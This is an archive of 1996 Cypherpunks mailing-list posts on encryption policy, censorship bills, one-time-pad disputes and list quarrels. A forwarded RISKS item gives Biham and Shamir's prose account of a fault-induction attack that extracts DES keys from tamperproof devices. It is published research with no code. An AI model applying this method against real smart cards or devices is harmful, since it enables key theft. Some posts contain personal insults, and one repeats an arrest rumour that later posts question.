international encryption conference in Paris on Sept. 25, mentioned this
story to explain how easy it was to have his privacy on personal medical
records beached. And that to encrypt this sensitive information may be the
ultimate solution. Zimmermann is president of PGP Inc., which develops
computer security software based on his popular program Pretty Good Privacy
(http://www.pgp.com).

		*	*	*	*	*
		NEW YORK's CDA ON TRACKS

---fwd message---
>==============
>VTW BillWatch #61
>
>VTW BillWatch: A newsletter tracking US Federal legislation
>affecting civil liberties.  BillWatch is published about every
>week as long as Congress is in session. (Congress is in session)
>
>BillWatch is produced and published by the
>Voters Telecommunications Watch (vtw@vtw.org)
>
>Issue #61, Date: Thu Oct 17 01:17:52 EDT 1996
>

...

>
>FREE NOV. 3RD SEMINAR ON NY STATE INTERNET CENSORSHIP BILL
>
>To learn more about this free cybercast seminar see http://www.vtw.org/speech/
>
>New York state recently passed a bill that criminalizes expression
>online that is currently legal in print. When it goes into effect on
>November 1, World Wide Web pages, Usenet postings, and email lists that
>fall under the law may become subject to criminal prosecution, as might the
>Internet providers that host them.
>
>But don't panic! VTW and the Netly News (http://www.pathfinder.com/Netly/)
>are putting on a seminar to educate you on the history of the bill, the ins
>and outs of it and what you should ask your own lawyer, as well as the
>status of any pending legal challenges.
>
>Who should attend?
>------------------
>Anyone who publishes information on the Internet, including through
>World Wide Web pages, Usenet, Email lists, or interactive chats.
>Attorneys whose clientele include any of the above.
>Journalists whose beat include the Internet or online services.
>....and you!

...

>Who will be there?
>-------------------------------
>Speakers marked as "invited" have told us they intend to come, but have
>informed us of potential conflicts that same day that might interfere with
>their attendance.
>
>Live speakers . Rep. Jerrold Nadler (D-NY) invited: Opening remarks .
>Shabbir J. Safdar, President (VTW Center for Internet Education) .
>Steve Barber, Legislative Counsel (VTW): How will this bill affect you, and
>what you should ask your own attorney .
>Ann Beeson, Litigation Staff (ACLU) invited
>
>Speakers available online through interactive chat
>Diana Jarvis, Staff Counsel (VTW Center for Internet Eduation)
>Stephen Filler, Law Offices of Stephen C. Filler invited

...

>Where and when is this seminar?
>-------------------------------
>
>The seminar will be held at Outernet, Inc, home of bway.net at,
>
>Outernet, Inc.
>626 Broadway, Suite 3-A
>(Very close to the Broadway/Lafayette stop on the F train)

...

---end of fwd message---


--------------------------------
the lambda bulletin, 2.11
http://www.freenix.fr/netizen




=+= the lambda bulletin -> www.freenix.fr/netizen =+=
=-= Jerome Thorel, Journalist, Paris (Planete Internet Editor) =-=  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 21 Oct 1996 12:08:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Chinese internal internet
Message-ID: <01IAWMVWDQSGA733QP@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I seem to recall someone predicting that China and other such countries
would set up an internal net with strict controls. Good prediction... I wouldn't
be surprised to see Cuba recruited to it, for instance, although North Korea
doesn't appear likely (too insular).
	-Allen

>   ______________________________________________________________________
>                                  Centura
>   ______________________________________________________________________
>               China's Xinhua launches business computer network
>  __________________________________________________________________________
                                       
>      Copyright (c) 1996 Nando.net
>      Copyright (c) 1996 Reuter Information Service
      
>   BEIJING (Oct 21, 1996 10:25 a.m. EDT) - A China-wide computer network
>   launched by a subsidiary of the official news agency Xinhua on Monday
>   will take Chinese businesses online and supply them with news and
>   economic information, company officials said.
   
>   The China Wide Web (CWW) created by China Internet Corp would provide
>   Chinese customers with online services in their own language and would
>   give overseas subscribers a window on to the Chinese business world,
>   company chairman Ma Yunsheng said.

	I've about concluded that we'll see a Web dominated by two languages -
English and Japanese. It's very hard for native speakers of Indo-European
languages to learn Japanese, it's very hard for native speakers of Japanese
to learn English, and no other such language has a prosperous-enough home
country to work. Such internal nets may alter this, however...
   
[...]

>   In January, Xinhua was appointed the government regulator for foreign
>   suppliers of economic information in China, a role that some analysts
>   say clashes with its involvement in enterprises that supply financial
>   and business data.
   
[...]

>   Unlike the open-access Internet, CWW was modelled on internal company
>   networks or "intranets," Edelson said.
   
>   "There will be a lot of real-time information available," he said. "I
>   think there's going to be very fast growth from a zero start."
   
>   China Internet would enjoy free use of Xinhua's communications network
>   and already had access agreements with the powerful Minstry of Posts
>   and Telecommunications, he said.
   
>   Ma said domestic economic information would also be available through
>   Xinhua news services and databases. He declined to say how many
>   clients were expected to subscribe.

	Heavily edited domestic economic information...
   
>   The Internet is viewed by some Chinese officials as a haven for
>   pornography and political dissent but CWW would likely be a
>   politically correct alternative.
   
>   "CWW should reflect Chinese culture," technology officer Wong said,
>   without giving details.

	Ah, yes, the old claim of cultural difference to try to justify
censorship. So Nazi Germany was due to a cultural difference?
   
****** MESSAGE DAMAGED IN TRANSIT ******




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 21 Oct 1996 13:40:50 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
In-Reply-To: <cuo6VD1w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961021133058.25121B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 21 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> I think to talk about cryptography to the San Francisco Gay and
> Lesbian Cypherpunks is to throw beads before the swine.

Dimitri, the expression is to cast pearls before swine.  If
you wish to be rude and insulting, at least try to avoid looking
like an ignorant Cossack.  If you actually feel this way about
the Bay area Cypherpunks, why have you given a provisional Yes 
to your visit?  Smells of intellectual dishonest and cowardice
to me.  


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 21 Oct 1996 10:49:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Reno at FCBA
Message-ID: <1.5.4.32.19961021174735.0066a640@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Communications Daily, October 19, 1996

   U.S. Attorney Gen. Janet Reno offered to "set the record
   straight" at FCBA lunch Thurs... 


   U.S. Attorney Gen. Janet Reno offered to "set the record
   straight" at FCBA lunch Thurs. on why controversial
   issues of encryption and digital wiretapping "deserve
   support" of communications industry. She said law
   enforcement community agrees that encryption is
   "critical" to citizens who want to protect sensitive data
   but "our ability to protect life and property is
   threatened" if people use encryption that can't be
   accessed by law enforcement officials: "The only solution
   is encryption that allows data recovery." She said it's
   "important to understand" that digital wiretapping
   "doesn't expand the government's ability to conduct
   electronic surveillance."

   -----

   If any citizen has access to a full transcript of the
   AG's talk, please post here or send it to us by fax to
   212-799-4003.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 21 Oct 1996 14:35:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Prof Shamir arrested
Message-ID: <199610212134.OAA10515@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:56 PM 10/21/96 +0100, Tom Womack wrote:
>
>A few column inches in the British Independent had Prof Avi Shamir (who I 
>guess is the S in RSA) arrested in Israel, on (I believe) suspicion of 
>involvement in a substantial fraud.

We should carefully note the use of the word "fraud" in this message, and 
presumably it's how the news story will describe the situation.   Notice 
that the authors of the idea, "Binding Cryptography," repeatedly like to use 
the term "fraud" to describe sending bits with other than the prescribed 
pattern which shows that the key has been appropriately GAK'd.

Further recall that the so-called "Bit Tax" idea, the one most recently 
proposed by that Belgian (?) Luc Soete, would apparently require that any 
data transmitter keep account of any data it sends, in order to collect some 
sort of tax, and thus any mistake in the count (either as a result of 
misinterpretation of the rules, or a disk crash, or a power surge, etc) 
would presumably turn a minor error into "tax fraud," or maybe they'll call 
it "bit fraud."

My opinion was and is that one of the worst aspects of that bit tax idea was 
that it would automatically result in essentially everybody becoming 
unavoidably guilty of this "bit fraud", which from the name would presumably 
be criminalized.   Further, unlike taxing the profits of the ISP or a gross 
tax on revenue which was analogous to a sales tax (neither of which had 
anything to do with the actual data being transmitted) a "bit fraud" 
situation would presumably be used to justify wiretapping, ostensibly just 
to count bits, but in reality  would allow content monitoring as well.  And 
since the ISP would be under the gun for such a charge, presumably the 
government could extort cooperation from him, particularly encouraging him 
to violate the terms of the agreement he may have previously signed with his 
customers and divulge information without a warrant.

Isn't it interesting, however, that the term "fraud" can be misused to make 
what was previously not a crime into a crime?  Don't you wonder why the 
authors of that "Binding Cryptography" idea don't explain why a person would 
agree to some kind of GAK'd encryption standard which would (given the 
repeated use of the word "fraud") leave him open to what could become 
criminal charges some day?  

After all, the term fraud implies that somebody is being misled, and 
seriously misled at that.  However, most owners of equipment which is used 
to carry data on the Internet have only limited and marginal interest in the 
content of that data, and certainly would have no reason (absent some 
arm-twisting by government) to monitor and check the keys of the data it 
transmits.  If I owned equipment which transmitted Internet data, I wouldn't 
consider myself "defrauded" if some data went over that circuit which didn't 
have the correct-GAK data included.  Against whom, then, is this "fraud" 
against?

There's an old saying:  "When the only tool you have is a hammer, you treat 
all problems as though they are nails."  Well, governments and its 
apologists and minions seem to think that the main tool they have is being 
able to declare something to be "fraud" and punish it accordingly, and 
naturally they're anxious to convert all problems to "fraud" problems.    
That's why Luc Soete wants a bit tax, and I think that's why our Dutch 
friends keep talking about fraud in their government-friendly GAK system.  
And I won't be surprised if Avi Shamir is yet another victim of the 
"fraudification" of cryptography.

I wonder if Professor Shamir will now be receptive to a cryptographic 
solution to a political/governmental problem?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mianigand@outlook.net (Michael Peponis)
Date: Mon, 21 Oct 1996 07:46:14 -0700 (PDT)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
In-Reply-To: <ask5VD23w165w@bwalk.dm.com>
Message-ID: <326b8b04.262143111@205.164.13.10>
MIME-Version: 1.0
Content-Type: text/plain


:> > > Vulis, grow up.

That about sums it up.  

It's one thing to  endlessly insult Tim May.  I can just ignore those.

It's another thing to send huge files full of irrevelent bable about
genocide in some third world country that I have to wait till it
downloads before I can make the determination that it's pure garbage.
(No, I don't killfile people on this list, maybe I should start)

Sandy made you a fair offer, if you are out to prove that Tim May is
an <insert insult here> and you are the divine being of cryptology,
then show up to one of the meetings and prove yourself in person,
or atleast insult Tim to his face.


Regards,
Michael Peponis
PGP Encyrpted mail prefered for business corespondence
finger mianigand@outlook.net for public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 21 Oct 1996 07:55:32 -0700 (PDT)
To: jbugden@smtplink.alis.ca
Subject: RE: Goodbye
In-Reply-To: <9609218459.AA845913665@smtplink.alis.ca>
Message-ID: <Pine.BSI.3.95.961021144141.8390A-100000@usr11.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Oct 1996 jbugden@smtplink.alis.ca wrote:

> Harlan Ellison suggests one possibility in his 1967 story titled:
> The Prowler in the City at the Edge of the World.
> 
	hmmm, I know any number of people, formerly of the intelligensia,
    who easily qualify, starting with a few high volume burnt-out coders.

	as far as I see, my vision is limited by "The Edge of the World"
    --Sunday (20/10/96) BC is a perfect example.  

	BTW, about 10 years ago I was on flight from LA to London,
    first class, and BOTH Parker and Hart were on board --well, at least
    their physical material selves were on board --they are definitely
    skirting the edge of the abyss. Parker resembles the King, but not
    quite so short; Hart resembles Peter. No sleep possible that night
    with those two on board.

	Parker & Hart are definitely a few cards short...

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Womack <thomas.womack@merton.oxford.ac.uk>
Date: Mon, 21 Oct 1996 06:57:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Prof Shamir arrested
Message-ID: <Pine.OSF.3.91.961021145203.31537A-100000@sable.ox.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



A few column inches in the British Independent had Prof Avi Shamir (who I 
guess is the S in RSA) arrested in Israel, on (I believe) suspicion of 
involvement in a substantial fraud.

Tom

We will do what we have always done when we've had our back to
the wall; we will turn round and fight.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@miron.vip.best.com
Date: Mon, 21 Oct 1996 15:03:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Tim May is a fine person.
Message-ID: <199610212159.OAA01056@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May's early support of the cypherpunk concept has helped
advance the culture of humanity! A true scholar, Tim analyzes
the various ideas presented to the cypherpunks list, and gives
his honest opinion, even when that opinion is not popular. In
doing so, Tim displays truly noble courage.

Unlike some others on this list, Tim has not sought to make purely
personal attacks of the other inhabitants of the list and has shown
impeccable restraint in doing so.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@ACM.ORG>
Date: Mon, 21 Oct 1996 12:04:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Prof Shamir arrested
Message-ID: <2.2.32.19961021190029.0071d7a0@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:56 PM 10/21/96 +0100, Tom Womack <thomas.womack@merton.oxford.ac.uk>
wrote:
>
>A few column inches in the British Independent had Prof Avi Shamir (who I 
>guess is the S in RSA) arrested in Israel, on (I believe) suspicion of 
>involvement in a substantial fraud.

The S in RSA is Adi Shamir.  Do you know if this is the same person? Do you
have any more details?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 21 Oct 1996 08:57:33 -0700 (PDT)
To: walrus <walrus@tcgcs.com>
Subject: Re: [crypto-philo]OTP or DES?
Message-ID: <845910403.8325.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> It is quite easy to take the bits of the des-encrypted message, and
> calculate the OTP key nessasary to decrypt the message into your real plan.
> It would seem you could build a key to have your message say anything of
> equal length.  Why then must a true OTP be based on a true RNG?  Because one
> of the actual possible keys of a real OTP is indeed the encrypted des
> message, you can claim that it is an otp and no-one can prove otherwise.
> They can say "But we cracked your des key and can decypher this message!"
> and you say "nope i used an OTP, that is a false message, here is what it
> really says! The fact that by PURE coincidence that OTP could be decrypted
> using that particular key means nothing, because a true OTP can generate
> that bit sequence.

Not quite, 

It is so unlikely that any DES key would exist to turn a one time pad 
encrypted message into an intelligible plaintext with no errors, 
proper linguistic structure etc. that it just wouldn`t wash.

I shiver at the idea of calculating the probability (my statistics is 
a bit rusty) but it is a pretty damn small probability given that the 
set of all possible DES ciphertexts is a smallish subset of all 
possible binary values (if memory serves correctly, I may be off the 
mark here though).

This may work with a stream cipher (which is pretty similar to a OTP 
apart from not being provably secure because the entropy of the key 
is greater than or equal to that of the message) where you can have 
any possible binary value as your ciphertext...
However, for a block cipher, this would appear to me to be impossible 
for most ciphertexts.


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 21 Oct 1996 10:02:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Q.E.D. reply to petty MESSger (fwd)
Message-ID: <845910399.8264.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> > IPG Sales writes:
> 
> [approx. 300 lines of ramblings deleted]
> 
> Mister, if we printed out your last message on fluffy paper and folded
> it together a number of times, then maybe we would end up with something
> that a poor woman would call a one-time pad.  Period.
 
Clap clap whistle clap....... Aha, wit still survives on the 
cypherpunks list!!!!
Truly inspired.


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 21 Oct 1996 09:48:39 -0700 (PDT)
To: "Robert J. Shueey" <rshueey@tcgcs.com>
Subject: Re: Question: OTP
Message-ID: <845910399.8296.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> This whole thing seems crazier each time I think about it.
> basically my question is: given that he picks his key securly does he have
> an OTP if the plaintext is shorter than the key?
> Bob

Yes, if he were just to modular add the key to the plaintext (or XOR 
them) he would have an OTP if AND ONLY IF the key were real random, 
however, he doesn`t do this, he uses the key to seed an array or 
linear congruential generators, which have been cryptanalysed to hell 
and back.

Basically, ALWAYS, and I mean ALWAYS dismiss anyone trying to sell an 
OTP, they are totally impractical, he`s just using technobabble to 
get around the fact that his system is actually a stream cipher and 
is of no value because it has been broken within days of being 
announced.



 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Mon, 21 Oct 1996 15:21:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Selections from RISKS DIGEST 18.54
Message-ID: <3.0b36.32.19961021152007.0111ee44@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


The latest issue of RISKS has some info of Crypto interest.  The second one
may have been posted to the list, but the first is well worth reading.
(Shamir Adi on new methods of breaking sealed module cryptosystems.  Maybe
this is why they hauled him away...)

>Date: Fri, 18 Oct 1996 16:58:50 +0200
>From: Shamir Adi <shamir@wisdom.weizmann.ac.il>
>Subject: A new attack on DES 
>
>You have recently referred in RISKS [18.50, 18.52] to the ingenious new
>attack against public key cryptosystems developed at Bellcore. All the
>published information on the subject (including Bellcore's press release)
>stress that the attack is not applicable to secret key cryptosystems.  Well,
>Eli Biham and I have just released a research announcement in which we show
>that an extension of the attack can, under the same realistic fault model,
>break almost any secret-key algorithm, including DES, multiple DES, IDEA,
>etc. The attack on DES was actually implemented on a PC, and it found the
>key by analysing fewer than 200 ciphertexts generated from unknown
>cleartexts.
>
>Adi Shamir
>
>= = = = = =
>
>Research announcement: A new cryptanalytic attack on DES
>
>Eli Biham                                 Adi Shamir
>Computer Science Dept.                    Applied Math Dept.
>The Technion                              The Weizmann Institute
>Israel                                    Israel
>
>                 18 October 1996
>                     (DRAFT)
>
>In September 96, Boneh Demillo and Lipton from Bellcore announced an
>ingenious new type of cryptanalytic attack which received widespread
>attention (see, e.g., John Markoff's 9/26/96 article in the New York Times).
>Their full paper had not been published so far, but Bellcore's press release
>and the authors' FAQ (available at
>http://www.bellcore.com/PRESS/ADVSRY96/medadv.html) specifically state that
>the attack is applicable only to public key cryptosystems such as RSA, and
>not to secret key algorithms such as the Data Encryption Standard (DES).
>According to Boneh, "The algorithm that we apply to the device's faulty
>computations works against the algebraic structure used in public key
>cryptography, and another algorithm will have to be devised to work against
>the nonalgebraic operations that are used in secret key techniques." In
>particular, the original Bellcore attack is based on specific algebraic
>properties of modular arithmetic, and cannot handle the complex bit
>manipulations which underly most secret key algorithms.
>
>In this research announcement, we describe a related attack (which we call
>Differential Fault Analysis, or DFA), and show that it is applicable to
>almost any secret key cryptosystem proposed so far in the open literature.
>In particular, we have actually implemented DFA in the case of DES, and
>demonstrated that under the same hardware fault model used by the Bellcore
>researchers, we can extract the full DES key from a sealed tamperproof DES
>encryptor by analysing fewer than 200 ciphertexts generated from unknown
>cleartexts.  The power of Differential Fault Analysis is demonstrated by the
>fact that even if DES is replaced by triple DES (whose 168 bits of key were
>assumed to make it practically invulnerable), essentially the same attack
>can break it with essentially the same number of given ciphertexts.
>
>We would like to greatfully acknowledge the pioneering contribution of Boneh
>Demillo and Lipton, whose ideas were the starting point of our new attack.
>
>In the rest of this research announcement, we provide a short technical
>summary of our practical implementation of Differential Fault Analysis of 
>DES. Similar attacks against a large number of other secret key cryptosystems
>will be described in the full version of our paper.
>
>TECHNICAL DETAILS OF THE ATTACK
>
>The attack follows the Bellcore fundamental assumption that by exposing a
>sealed tamperproof device such as a smart card to certain physical effects
>(e.g., ionizing or microwave radiation), one can induce with reasonable
>probability a fault at a random bit location in one of the registers at some
>random intermediate stage in the cryptographic computation. Both the bit
>location and the round number are unknown to the attacker.
>
>We further assume that the attacker is in physical possession of the
>tamperproof device, so that he can repeat the experiment with the same
>cleartext and key but without applying the external physical effects. As a
>result, he obtains two ciphertexts derived from the same (unknown) cleartext
>and key, where one of the ciphertexts is correct and the other is the result
>of a computation corrupted by a single bit error during the computation. For
>the sake of simplicity, we assume that one bit of the right half of the data
>in one of the 16 rounds of DES is flipped from 0 to 1 or vice versa, and
>that both the bit position and the round number are uniformly distributed.
>
>In the first step of the attack we identify the round in which the fault
>occurred.  This identification is very simple and effective: If the fault
>occurred in the right half of round 16, then only one bit in the right half
>of the ciphertext (before the final permutation) differs between the two
>ciphertexts. The left half of the ciphertext can differ only in output bits
>of the S box (or two S boxes) to which this single bit enters, and the
>difference must be related to non-zero entries in the difference
>distribution tables of these S boxes.  In such a case, we can guess the six
>key bit of each such S box in the last round, and discard any value which
>disagree with the expected differences of these S boxes (e.g., differential
>cryptanalysis). On average, about four possible 6-bit values of the key
>remain for each active S box.
>
>If the faults occur in round 15, we can gain information on the key bits
>entering more than two S boxes in the last round: the difference of the
>right half of the ciphertext equals the output difference of the F function
>of round 15.  We guess the single bit fault in round 15, and verify whether
>it can cause the expected output difference, and also verify whether the
>difference of the right half of the ciphertext can cause the expected
>difference in the output of the F function in the last round (e.g., the
>difference of the left half of the ciphertext XOR the fault).  If
>successful, we can discard possible key values in the last round, according
>to the expected differences.  We can also analyse the faults in the 14'th
>round in a similar way.  We use counting methods in order to find the key.
>In this case, we count for each S box separately, and increase the counter
>by one for any pair which suggest the six-bit key value by at least one of
>its possible faults in either the 14'th, 15'th, or 16'th round.
>
>We have implemented this attack on a personal computer.  Our analysis
>program found the whole last subkey given less than 200 ciphertexts,
>with random single-faults in all the rounds.
>
>This attack finds the last subkey.  Once this subkey is known, we can
>proceed in two ways: We can use the fact that this subkey contains 48 out of
>the 56 key bits in order to guess the missing 8 bits in all the possible
>2^8=256 ways. Alternatively, we can use our knowledge of the last subkey to
>peel up the last round (and remove faults that we already identified), and
>analyse the preceding rounds with the same data using the same attack. This
>latter approach makes it possible to attack triple DES (with 168 bit keys),
>or DES with independent subkeys (with 768 bit keys).
>
>This attack still works even with more general assumptions on the fault
>locations, such as faults inside the function F, or even faults in the key
>scheduling algorithm.  We also expect that faults in round 13 (or even prior
>to round 13) might be useful for the analysis, thus reducing the number of
>required ciphertext for the full analysis.
>
>OTHER VULNERABLE CIPHERS
>
>Differential Fault Analysis can break many additional secret key
>cryptosystems, including IDEA, RC5 and Feal.  Some ciphers, such as Khufu,
>Khafre and Blowfish compute their S boxes from the key material.  In such
>ciphers, it may be even possible to extract the S boxes themselves, and the
>keys, using the techniques of Differential Fault Analysis.  Differential
>Fault Analysis can also be applied against stream ciphers, but the
>implementation might differ by some technical details from the
>implementation described above.
>
>------------------------------
>
>Date: Fri, 18 Oct 1996 09:21:58 -0400 (EDT)
>From: Edupage Editors <educom@elanor.oit.unc.edu>
>Subject: "Key Recovery" Replaces "Key Escrow" in Encryption Plan (Edupage)
>
>The latest government proposal for encryption software controls touts a new
>approach called "key recovery."  This provision would allow law enforcement
>officials to rebuild, or "recover" the mathematical key to encoded messages
>with the help of third-party code-breakers.  The new policy reflects
>suggestions made in a National Research Council report released earlier this
>year.  Under the Clinton plan, encryption keys would be expanded from 40
>bits to 56 bits in products to be exported, provided the company agrees to
>the key recovery process.  In addition, authority to issue licenses for
>overseas sales of such products would move from the State Department, where
>they're handled as "munitions," over to the Commerce Department.  The
>Business Software Alliance, however, is still not completely happy with the
>compromise.  "We expect to go back to Congress," says a BSA spokeswoman.
>"Although the announcement was clearly a step in the right direction, it's
>not at all what the industry was looking for in its entirety."  (*Investor's
>Business Daily* 17 Oct 1996 A4; Edupage 17 October 1996)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 21 Oct 1996 15:46:36 -0700 (PDT)
To: rshueey@tcgcs.com>
Subject: Re: Question: OTP
Message-ID: <199610212245.PAA16503@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:06 PM 10/21/96 +0000, paul@fatmans.demon.co.uk wrote:
>
>> This whole thing seems crazier each time I think about it.
>> basically my question is: given that he picks his key securly does he have
>> an OTP if the plaintext is shorter than the key?
>> Bob
>
>Yes, if he were just to modular add the key to the plaintext (or XOR 
>them) he would have an OTP if AND ONLY IF the key were real random, 
>however, he doesn`t do this, he uses the key to seed an array or 
>linear congruential generators, which have been cryptanalysed to hell 
>and back.


I think that there may be at least one potential application for a sorta-OTP 
system to be overlaid on a reasonably-secure public-key system:  I think 
there might be an use for a system that allows the recipient of a message to 
prove to his own satisfaction that the sender of the message is who he says 
he is, but does NOT allow him to prove this to anyone else's satisfaction.  
The goal would be to prevent one party to the commucation from being 
strongarmed into not only revealing the data, but also providing trustworthy 
evidence against the other person.  I haven't thought about this in enough 
detail to know if this is practical.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 21 Oct 1996 13:10:16 -0700 (PDT)
To: Jim Byrd <byrd@ACM.ORG>
Subject: Re: Prof Shamir arrested
Message-ID: <1.5.4.32.19961021200933.00680aac@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:00 PM 10/21/96 -0400, Jim Byrd wrote:
>At 02:56 PM 10/21/96 +0100, Tom Womack <thomas.womack@merton.oxford.ac.uk>
>wrote:
>>
>>A few column inches in the British Independent had Prof Avi Shamir (who I 
>>guess is the S in RSA) arrested in Israel, on (I believe) suspicion of 
>>involvement in a substantial fraud.
>
>The S in RSA is Adi Shamir.  Do you know if this is the same person? Do you
>have any more details?

Since we posted the item below to c'punks this morning, I see 
that WSJ and Financial Times have stories on the News 
Datacom tax fraud raid.

Perhaps Shamir has not been actually arrested, maybe only
implicated. Anyone in Jerusalem know more?

----------


   In a coincidence with the Biham/Shamir smart card attack,
   AP reports October 20 on an Israeli raid of News Datacom
   Research for $150 million tax fraud, allegedly because
   locally developed crypto products were smuggled out of
   the country. News Datacom develops and markets encryption
   systems for pay-TV based on Shamir's work, and he is a
   part-owner.

   Recall that Markoff's story on DFA cited Bahim's
   experience with pirate-TV and smart-card tampering.

   Financial Times ran stories last May about the company's 
   financial derring-do, which we've placed with the AP 
   report at:

      http://jya.com/keylok.txt

   We've also put the Biham/Shamir DFA post and NYT article
   at:

      http://jya.com/dfa.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 22 Oct 1996 09:23:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: IPG algorithm - timing attack
Message-ID: <846000189.16800.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> The author of this private mail can step forward if he wishes; its a
> good thing to have noticed.
> 
> Adam
> | > The algorithm is:

[USELESS IPG ALGORITHM CUT]

> | Also note this would be exceptionally vulnerable to Paul Kochers 
> | timing attacks if used as a real time stream cipher.
> | 
> | Yet the author of this still claims it is a one time pad and as such 
> | cannot be cryptanalysed. I feel a snake oil attack coming on...

The was my work...
I meant to send this to the cypherpunks list but somehow my mail 
program just replied it privately to Adam. Has anyone else looked at 
this?
BTW, this IPG guy could have invented the new FEAL here, the first 
algorithm anyone tries any new attack on!!! ;-) 

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 22 Oct 1996 09:23:11 -0700 (PDT)
To: cypher@cyberstation.net
Subject: Re: Apologies and Clarifications -
Message-ID: <846000188.16795.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


 
>          Some will contentiously assert that the key and other
>          parameters might be hacked. While we include within the
>          system facilitators that reduce that risk to a minimum, and
>          to near zero if you use simple precautions, it is true that
>          the hacking possibility exists. However, that possibility
>          exists for RSA, PGP, hardware sourced OTPs, or any other
>          form of security or encryption. We are better positioned in
>          that regard than others but in terms of the human element,
>          as we all know, there is no such thing as perfection.

Listen fool,

Much as we might advance this possibility we do not need to.

Your system has been proven insecure by two cryptanalytic attacks, 
